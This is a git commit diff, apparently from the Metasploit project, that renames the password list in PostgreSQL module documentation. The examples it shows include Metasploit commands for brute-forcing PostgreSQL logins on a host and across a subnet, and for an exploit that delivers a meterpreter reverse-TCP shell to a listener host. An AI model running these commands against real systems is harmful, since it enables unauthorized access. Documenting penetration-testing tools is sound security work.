Use wordlist for clarity

This commit is contained in:
adfoster-r7
2022-04-22 14:28:34 +01:00
parent fc9e7b6b81
commit a20c281507
3 changed files with 10 additions and 10 deletions
+4 -4
View File
@@ -43,14 +43,14 @@ Brute-force host with known user and password list:
```
use auxiliary/scanner/postgres/postgres_login
run postgres://known_user@192.168.222.1 threads=50 pass_file=./rockyou.txt
run postgres://known_user@192.168.222.1 threads=50 pass_file=./wordlist.txt
```
Brute-force credentials:
```
use auxiliary/scanner/postgres/postgres_login
run postgres://192.168.222.1 threads=50 user_file=./users.txt pass_file=./rockyou.txt
run postgres://192.168.222.1 threads=50 user_file=./users.txt pass_file=./wordlist.txt
```
Brute-force credentials in a subnet:
@@ -58,7 +58,7 @@ Brute-force credentials in a subnet:
```
use auxiliary/scanner/postgres/postgres_login
run cidr:/24:postgres://user:pass@192.168.222.0 threads=50
run cidr:/24:postgres://user@192.168.222.0 threads=50 pass_file=./rockyou.txt
run cidr:/24:postgres://user@192.168.222.0 threads=50 pass_file=./wordlist.txt
```
### PostgreSQL Capture Server
@@ -115,4 +115,4 @@ run 'postgres://user:this is my password@192.168.1.123/database_name' sql='selec
```
use exploit/linux/postgres/postgres_payload
run postgres://postgres:password@192.168.123.6 lhost=192.168.123.1 lport=5000 payload=linux/x64/meterpreter/reverse_tcp target='Linux\ x86_64'
```
```